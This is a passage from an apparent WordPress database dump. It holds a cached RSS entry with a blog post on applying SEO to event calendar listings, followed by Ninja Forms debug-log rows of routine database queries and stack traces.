+0000\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:8:\\\"category\\\";a:2:{i:0;a:5:{s:4:\\\"data\\\";s:8:\\\"Articles\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}i:1;a:5:{s:4:\\\"data\\\";s:3:\\\"seo\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:4:\\\"guid\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:40:\\\"https://theeventscalendar.com/?p=1829530\\\";s:7:\\\"attribs\\\";a:1:{s:0:\\\"\\\";a:1:{s:11:\\\"isPermaLink\\\";s:5:\\\"false\\\";}}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:11:\\\"description\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:617:\\\"<p>If you’ve got a search engine optimization (SEO) strategy for your website, chances are you’re already deploying it in the usual places: your home page, your blog posts, your image alt text and metadata, your video descriptions, etc. But what about SEO in your events calendar? Your calendar is an extension of your website. That&#8230;</p>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/4-ways-the-pros-use-seo-for-events/\\\">4 Ways the Pros Use &lt;abbr&gt;SEO&lt;/abbr&gt; for Events</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:32:\\\"http://purl.org/dc/elements/1.1/\\\";a:1:{s:7:\\\"creator\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:5:\\\"Geoff\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:40:\\\"http://purl.org/rss/1.0/modules/content/\\\";a:1:{s:7:\\\"encoded\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:16606:\\\"<p>If you’ve got a search engine optimization (<abbr>SEO</abbr>) strategy for your website, chances are you’re already deploying it in the usual places: your home page, your blog posts, your image alt text and metadata, your video descriptions, etc.</p>\\n<p>But what about <abbr>SEO</abbr> in your events calendar?</p>\\n<p>Your calendar is an extension of your website. That means it deserves the royal <abbr>SEO</abbr> treatment just like the rest of your content! In a WordPress environment, each event is a post and each post is auto-linked to the main calendar. They&#8217;re even linked to other events through filters, tags, and categories. Thinking of events as <abbr>SEO</abbr> opportunities will bolster your site rank in search results while also making it easier for people to find your events — a benefit that will seriously pay off in the form of increased attendance at your events. That’s a win-win for everyone (and especially for you).</p>\\n<p>Wondering how exactly you can maximize your blog’s <abbr>SEO</abbr> potential? Here are a few tips to get you started.</p>\\n<h2>Strategy 1: Apply <abbr>SEO</abbr> best practices to your events</h2>\\n<p><img class=\\\"alignnone size-full wp-image-1829584\\\" src=\\\"https://s3.theeventscalendar.com/uploads/2019/07/seo-event-calendar-content.png\\\" alt=\\\"An illustration of a webpage, a blog post, and an event page all feeding into search results.\\\" width=\\\"1200\\\" height=\\\"600\\\" srcset=\\\"https://s3.theeventscalendar.com/uploads/2019/07/seo-event-calendar-content.png 1200w, https://s3.theeventscalendar.com/uploads/2019/07/seo-event-calendar-content-140x70.png 140w, https://s3.theeventscalendar.com/uploads/2019/07/seo-event-calendar-content-300x150.png 300w, https://s3.theeventscalendar.com/uploads/2019/07/seo-event-calendar-content-768x384.png 768w, https://s3.theeventscalendar.com/uploads/2019/07/seo-event-calendar-content-665x333.png 665w, https://s3.theeventscalendar.com/uploads/2019/07/seo-event-calendar-content-430x215.png 430w, https://s3.theeventscalendar.com/uploads/2019/07/seo-event-calendar-content-645x323.png 645w, https://s3.theeventscalendar.com/uploads/2019/07/seo-event-calendar-content-1068x534.png 1068w, https://s3.theeventscalendar.com/uploads/2019/07/seo-event-calendar-content-460x230.png 460w, https://s3.theeventscalendar.com/uploads/2019/07/seo-event-calendar-content-600x300.png 600w, https://s3.theeventscalendar.com/uploads/2019/07/seo-event-calendar-content-500x250.png 500w\\\" sizes=\\\"(max-width: 1200px) 100vw, 1200px\\\" /></p>\\n<p>Your <abbr>SEO</abbr> keywords and tactics come out in full force when you’re working on blog posts, right? But when you start to create a new event listing, does it seem like those habits fall to the wayside?</p>\\n<p><strong>Remember, events are content that Google (and other search engines) treat no differently than any other content on your site.</strong> They deserve the same amount of <abbr>SEO</abbr> attention as the rest of your content. When you create a new event, keep your <abbr>SEO</abbr> basics and best practices in mind:</p>\\n<ul>\\n<li>Use keywords in your event titles to help people (and search engines) know what it is. A good example is using something like “3rd Annual Letterkenny Adult Spelling Bee” instead of “Zach’s Favorite Event.”</li>\\n<li>Write detailed event descriptions that emphasize your target keywords in a natural (not forced!) way.</li>\\n<li>Make the content for your the events accessible to people of all abilities. Using descriptive alt text, for example, helps describe images for screen readers.</li>\\n<li>Make sure events have dedicated URLs featuring the title and other <abbr>SEO</abbr>-friendly information.</li>\\n<li>Include the event title and date in all image file names. It’s easy to forget that image files are content, too!</li>\\n<li><a href=\\\"https://www.eventmanagerblog.com/7-reasons-your-events-need-better-seo\\\">Zero in on key details</a>, like header tags and anchor text for links.</li>\\n<li>Don’t forget to use categories and tags, to be even more descriptive and link related posts together.</li>\\n</ul>\\n<p><abbr>SEO is about more than words on digital pages. Show search engines that your event is relevant to users by driving traffic to the registration page (<a href=\\\"https://theeventscalendar.com/strategies-to-nail-event-registration-process/\\\">here’s a quick post</a> on how to do that).</abbr></p>\\n<h2>Strategy 2: Split events up into multiple listings for more <abbr>SEO</abbr>-dometer-busting horsepower</h2>\\n<p><img class=\\\"alignnone size-full wp-image-1829590\\\" src=\\\"https://s3.theeventscalendar.com/uploads/2019/07/seo-split-event.png\\\" alt=\\\"An illustration of an event page being hammered into three smaller events.\\\" width=\\\"1200\\\" height=\\\"777\\\" srcset=\\\"https://s3.theeventscalendar.com/uploads/2019/07/seo-split-event.png 1200w, https://s3.theeventscalendar.com/uploads/2019/07/seo-split-event-131x85.png 131w, https://s3.theeventscalendar.com/uploads/2019/07/seo-split-event-300x194.png 300w, https://s3.theeventscalendar.com/uploads/2019/07/seo-split-event-768x497.png 768w, https://s3.theeventscalendar.com/uploads/2019/07/seo-split-event-665x431.png 665w, https://s3.theeventscalendar.com/uploads/2019/07/seo-split-event-430x278.png 430w, https://s3.theeventscalendar.com/uploads/2019/07/seo-split-event-645x418.png 645w, https://s3.theeventscalendar.com/uploads/2019/07/seo-split-event-1068x692.png 1068w, https://s3.theeventscalendar.com/uploads/2019/07/seo-split-event-460x298.png 460w, https://s3.theeventscalendar.com/uploads/2019/07/seo-split-event-600x389.png 600w, https://s3.theeventscalendar.com/uploads/2019/07/seo-split-event-500x324.png 500w\\\" sizes=\\\"(max-width: 1200px) 100vw, 1200px\\\" /></p>\\n<p>The more content you have on your site, the more opportunities you have to work in keywords and strategic hyperlinks. So, the next time you’re creating a new event listing, consider whether it makes sense to split a single event into two or more listings. Sort of how you might split a long, wordy blog post into three separate posts. For example, instead of creating a six-hour-long event for your fundraising gala, you could make separate event listings: one for the welcome reception, a second for the dinner, and a third for the after party.</p>\\n<p><strong>Bonus:</strong> This helps attendees see exactly what an event entails and it helps give you an idea of which parts of your event will be busiest. In this example, it also means you’ve tripled your <abbr>SEO</abbr> potential with lots of precious new <abbr>SEO</abbr> real estate in your events calendar!</p>\\n<h2>Strategy 3: Leverage structured data so search engines recognize the event</h2>\\n<p>Structured data is a fancy term that describes information in the code that tells search engines that your event is an event. Remember how we talked about events being treated like all other content? Well, it helps if we can tell a search engine that the content it&#8217;s scanning is related to something that takes place at a certain date and time.</p>\\n<p>Many search engines, like Google, use structured data to present events in a special way in search results. Here&#8217;s how one site has a list of events displayed when searching for events at the Hollywood Bowl.</p>\\n<p><img class=\\\"alignnone size-full wp-image-1829576\\\" src=\\\"https://s3.theeventscalendar.com/uploads/2019/07/google-hollywood-bowl.png\\\" alt=\\\"Three search results on Google, two of which using structured data that lists three upcoming events from the calendars on those sites.\\\" width=\\\"2080\\\" height=\\\"1572\\\" srcset=\\\"https://s3.theeventscalendar.com/uploads/2019/07/google-hollywood-bowl.png 2080w, https://s3.theeventscalendar.com/uploads/2019/07/google-hollywood-bowl-112x85.png 112w, https://s3.theeventscalendar.com/uploads/2019/07/google-hollywood-bowl-300x227.png 300w, https://s3.theeventscalendar.com/uploads/2019/07/google-hollywood-bowl-768x580.png 768w, https://s3.theeventscalendar.com/uploads/2019/07/google-hollywood-bowl-665x503.png 665w, https://s3.theeventscalendar.com/uploads/2019/07/google-hollywood-bowl-430x325.png 430w, https://s3.theeventscalendar.com/uploads/2019/07/google-hollywood-bowl-645x487.png 645w, https://s3.theeventscalendar.com/uploads/2019/07/google-hollywood-bowl-1068x807.png 1068w, https://s3.theeventscalendar.com/uploads/2019/07/google-hollywood-bowl-460x348.png 460w, https://s3.theeventscalendar.com/uploads/2019/07/google-hollywood-bowl-600x453.png 600w, https://s3.theeventscalendar.com/uploads/2019/07/google-hollywood-bowl-500x378.png 500w\\\" sizes=\\\"(max-width: 2080px) 100vw, 2080px\\\" /></p>\\n<p>Knowing we can give Google hints on how to display our content is a powerful tool. You&#8217;re already doing this if you&#8217;re using The Events Calendar plugin for WordPress. <a href=\\\"https://developers.google.com/search/docs/data-types/event\\\">Here&#8217;s a primer on structured data</a> that&#8217;s well worth bookmarking.</p>\\n<h2>Strategy 4: Search engine optimized, but make it social</h2>\\n<p><img class=\\\"alignnone size-full wp-image-1829601\\\" src=\\\"https://s3.theeventscalendar.com/uploads/2019/07/seo-events-social.png\\\" alt=\\\"An illustration of a calendar surrounded by social media logos for Twitter, Facebook, Pinterest and Instagram.\\\" width=\\\"1200\\\" height=\\\"777\\\" srcset=\\\"https://s3.theeventscalendar.com/uploads/2019/07/seo-events-social.png 1200w, https://s3.theeventscalendar.com/uploads/2019/07/seo-events-social-131x85.png 131w, https://s3.theeventscalendar.com/uploads/2019/07/seo-events-social-300x194.png 300w, https://s3.theeventscalendar.com/uploads/2019/07/seo-events-social-768x497.png 768w, https://s3.theeventscalendar.com/uploads/2019/07/seo-events-social-665x431.png 665w, https://s3.theeventscalendar.com/uploads/2019/07/seo-events-social-430x278.png 430w, https://s3.theeventscalendar.com/uploads/2019/07/seo-events-social-645x418.png 645w, https://s3.theeventscalendar.com/uploads/2019/07/seo-events-social-1068x692.png 1068w, https://s3.theeventscalendar.com/uploads/2019/07/seo-events-social-460x298.png 460w, https://s3.theeventscalendar.com/uploads/2019/07/seo-events-social-600x389.png 600w, https://s3.theeventscalendar.com/uploads/2019/07/seo-events-social-500x324.png 500w\\\" sizes=\\\"(max-width: 1200px) 100vw, 1200px\\\" /></p>\\n<p>Your event listing’s <abbr>SEO</abbr> value isn’t limited to its Google ranking. Social media channels are search engines in their own right, which means sharing your events and creating event listings on third-party sites like Facebook can make your events easier to find in social media searches. Here are some recommendations for <a href=\\\"https://theeventscalendar.com/3-tips-for-creating-pinterest-worthy-events/\\\">making a Pinterest-worthy event</a>.</p>\\n<p>Admittedly, your social media efforts probably don’t help your website SEO when it comes to search engine heavy hitters like Google, Baidu, and Bing. But think of social media as its own type of <abbr>SEO</abbr>. No matter where people are searching, be it Google or Instagram, you want to make it easy for them to find your events.</p>\\n<p>You also want to empower attendees to easily share your events with their own networks. This will help amplify your reach and increase the number of attendees at your next event. <a href=\\\"https://support.theeventscalendar.com/058413-Adding-social-media-sharing-to-events\\\">Adding social media sharing to events on your calendar</a> is easy with the help of plugins that integrate social sharing capabilities right into your event listings.</p>\\n<hr />\\n<p>So, forge ahead, keyword kings and metadata matriarchs! A whole new world of <abbr>SEO</abbr> opportunities awaits you. In the meantime, if you need help with any of your other calendar needs from event ticketing to promotion, The Events Calendar team has your back.</p>\\n\\n                <div class=\\\'gf_browser_unknown gform_wrapper gutenberg-email-form_wrapper\\\' id=\\\'gform_wrapper_31\\\' ><form method=\\\'post\\\' enctype=\\\'multipart/form-data\\\'  id=\\\'gform_31\\\' class=\\\'gutenberg-email-form\\\' action=\\\'/feed/\\\'>\\n                        <div class=\\\'gform_body\\\'><ul id=\\\'gform_fields_31\\\' class=\\\'gform_fields top_label form_sublabel_below description_below\\\'><li id=\\\'field_31_7\\\'  class=\\\'gfield field_sublabel_above field_description_above gfield_visibility_visible\\\' ><label class=\\\'gfield_label gfield_label_before_complex\\\'  >Name</label><div class=\\\'ginput_complex ginput_container no_prefix has_first_name no_middle_name has_last_name no_suffix gf_name_has_2 ginput_container_name\\\' id=\\\'input_31_7\\\'>\\n                            \\n                            <span id=\\\'input_31_7_3_container\\\' class=\\\'name_first\\\' >\\n                                                    <label for=\\\'input_31_7_3\\\' >First</label>\\n                                                    <input type=\\\'text\\\' name=\\\'input_7.3\\\' id=\\\'input_31_7_3\\\' value=\\\'\\\' aria-label=\\\'First name\\\'    aria-invalid=\\\"false\\\" />\\n                                                </span>\\n                            \\n                            <span id=\\\'input_31_7_6_container\\\' class=\\\'name_last\\\' >\\n                                                            <label for=\\\'input_31_7_6\\\' >Last</label>\\n                                                            <input type=\\\'text\\\' name=\\\'input_7.6\\\' id=\\\'input_31_7_6\\\' value=\\\'\\\' aria-label=\\\'Last name\\\'    aria-invalid=\\\"false\\\" />\\n                                                        </span>\\n                            \\n                        </div></li><li id=\\\'field_31_8\\\'  class=\\\'gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_hidden\\\' ><label class=\\\'gfield_label\\\' for=\\\'input_31_8\\\' >Email<span class=\\\'gfield_required\\\'>*</span></label><div class=\\\'ginput_container ginput_container_email\\\'>\\n                            <input name=\\\'input_8\\\' id=\\\'input_31_8\\\' type=\\\'email\\\' value=\\\'\\\' class=\\\'medium\\\'    aria-required=\\\"true\\\" aria-invalid=\\\"false\\\" />\\n                        </div></li><li id=\\\'field_31_3\\\'  class=\\\'gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible is-gf-checkbox\\\' ><label class=\\\'gfield_label\\\'  ><span class=\\\'gfield_required\\\'>*</span></label><div class=\\\'ginput_container ginput_container_checkbox\\\'><ul class=\\\'gfield_checkbox\\\' id=\\\'input_31_3\\\'><li class=\\\'gchoice_31_3_1\\\'>\\n								<input name=\\\'input_3.1\\\' type=\\\'checkbox\\\'  value=\\\'Sign me up for news &amp; updates\\\' checked=\\\'checked\\\' id=\\\'choice_31_3_1\\\'   />\\n								<label for=\\\'choice_31_3_1\\\' id=\\\'label_31_3_1\\\'>Sign me up for news & updates</label>\\n							</li></ul></div></li>\\n                            </ul></div>\\n        <div class=\\\'gform_footer top_label\\\'> <input type=\\\'submit\\\' id=\\\'gform_submit_button_31\\\' class=\\\'gform_button button\\\' value=\\\'Sign Up!\\\'  onclick=\\\'if(window[\\\"gf_submitting_31\\\"]){return false;}  if( !jQuery(\\\"#gform_31\\\")[0].checkValidity || jQuery(\\\"#gform_31\\\")[0].checkValidity()){window[\\\"gf_submitting_31\\\"]=true;}  \\\' onkeypress=\\\'if( event.keyCode == 13 ){ if(window[\\\"gf_submitting_31\\\"]){return false;} if( !jQuery(\\\"#gform_31\\\")[0].checkValidity || jQuery(\\\"#gform_31\\\")[0].checkValidity()){window[\\\"gf_submitting_31\\\"]=true;}  jQuery(\\\"#gform_31\\\").trigger(\\\"submit\\\",[true]); }\\\' /> \\n            <input type=\\\'hidden\\\' class=\\\'gform_hidden\\\' name=\\\'is_submit_31\\\' value=\\\'1\\\' />\\n            <input type=\\\'hidden\\\' class=\\\'gform_hidden\\\' name=\\\'gform_submit\\\' value=\\\'31\\\' />\\n            \\n            <input type=\\\'hidden\\\' class=\\\'gform_hidden\\\' name=\\\'gform_unique_id\\\' value=\\\'\\\' />\\n            <input type=\\\'hidden\\\' class=\\\'gform_hidden\\\' name=\\\'state_31\\\' value=\\\'WyJbXSIsImM3MzcyYjNlZGVlNTZhMGE4MDM4NGMzMzkwNmEwMGM3Il0=\\\' />\\n            <input type=\\\'hidden\\\' class=\\\'gform_hidden\\\' name=\\\'gform_target_page_number_31\\\' id=\\\'gform_target_page_number_31\\\' value=\\\'0\\\' />\\n            <input type=\\\'hidden\\\' class=\\\'gform_hidden\\\' name=\\\'gform_source_page_number_31\\\' id=\\\'gform_source_page_number_31\\\' value=\\\'1\\\' />\\n            <input type=\\\'hidden\\\' name=\\\'gform_field_values\\\' value=\\\'\\\' />\\n            \\n        </div>\\n                        </form>\\n                        </div><script type=\\\'text/javascript\\\'> jQuery(document).bind(\\\'gform_post_render\\\', function(event, formId, currentPage){if(formId == 31) {} } );jQuery(document).bind(\\\'gform_post_conditional_logic\\\', function(event, formId, fields, isInit){} );</script><script type=\\\'text/javascript\\\'> jQuery(document).ready(function(){jQuery(document).trigger(\\\'gform_post_render\\\', [31, 1]) } ); </script>\\n<p>The post <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com/4-ways-the-pros-use-seo-for-events/\\\">4 Ways the Pros Use &lt;abbr&gt;SEO&lt;/abbr&gt; for Events</a> appeared first on <a rel=\\\"nofollow\\\" href=\\\"https://theeventscalendar.com\\\">The Events Calendar</a>.</p>\\n\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}}}}}s:27:\\\"http://www.w3.org/2005/Atom\\\";a:1:{s:4:\\\"link\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:0:\\\"\\\";s:7:\\\"attribs\\\";a:1:{s:0:\\\"\\\";a:3:{s:4:\\\"href\\\";s:35:\\\"https://theeventscalendar.com/feed/\\\";s:3:\\\"rel\\\";s:4:\\\"self\\\";s:4:\\\"type\\\";s:19:\\\"application/rss+xml\\\";}}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}s:44:\\\"http://purl.org/rss/1.0/modules/syndication/\\\";a:2:{s:12:\\\"updatePeriod\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:9:\\\"\\n	hourly	\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}s:15:\\\"updateFrequency\\\";a:1:{i:0;a:5:{s:4:\\\"data\\\";s:4:\\\"\\n	1	\\\";s:7:\\\"attribs\\\";a:0:{}s:8:\\\"xml_base\\\";s:0:\\\"\\\";s:17:\\\"xml_base_explicit\\\";b:0;s:8:\\\"xml_lang\\\";s:0:\\\"\\\";}}}}}}}}}}}}s:4:\\\"type\\\";i:128;s:7:\\\"headers\\\";O:42:\\\"Requests_Utility_CaseInsensitiveDictionary\\\":1:{s:7:\\\"\\0*\\0data\\\";a:10:{s:4:\\\"date\\\";s:29:\\\"Sun, 25 Aug 2019 22:06:52 GMT\\\";s:12:\\\"content-type\\\";s:34:\\\"application/rss+xml; charset=UTF-8\\\";s:6:\\\"server\\\";s:21:\\\"nginx/1.10.3 (Ubuntu)\\\";s:13:\\\"cache-control\\\";s:29:\\\"max-age=3493, must-revalidate\\\";s:12:\\\"x-powered-by\\\";s:27:\\\"PHP/7.0.33-0ubuntu0.16.04.2\\\";s:4:\\\"vary\\\";s:6:\\\"Cookie\\\";s:13:\\\"last-modified\\\";s:29:\\\"Fri, 23 Aug 2019 12:58:00 GMT\\\";s:4:\\\"etag\\\";s:34:\\\"\\\"6b0342c8c0cae2b214b7113635eb7b52\\\"\\\";s:12:\\\"x-robots-tag\\\";s:15:\\\"noindex, follow\\\";s:4:\\\"link\\\";s:66:\\\"<https://theeventscalendar.com/wp-json/>; rel=\\\"https://api.w.org/\\\"\\\";}}s:5:\\\"build\\\";s:14:\\\"20190719180000\\\";}\', \'no\') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`)',NULL,NULL),(2,1,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/option.php\",\"line\":491,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/option.php\",\"line\":787,\"function\":\"add_option\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-feed-cache-transient.php\",\"line\":82,\"function\":\"set_transient\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-simplepie.php\",\"line\":1402,\"function\":\"save\",\"class\":\"WP_Feed_Cache_Transient\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/feed.php\",\"line\":764,\"function\":\"init\",\"class\":\"SimplePie\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/widgets.php\",\"line\":1439,\"function\":\"fetch_feed\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/the-events-calendar/src/Tribe/Main.php\",\"line\":3956,\"function\":\"wp_widget_rss_output\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/includes/template.php\",\"line\":1304,\"function\":\"outputDashboardWidget\",\"class\":\"Tribe__Events__Main\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/includes/dashboard.php\",\"line\":232,\"function\":\"do_meta_boxes\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/index.php\",\"line\":148,\"function\":\"wp_dashboard\"}]',NULL,NULL),(3,2,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_302\' AND post_id = 162680',NULL,NULL),(4,2,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(5,3,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162680, \'_field_302\', \'Test 1\')',NULL,NULL),(6,3,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(7,4,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_303\' AND post_id = 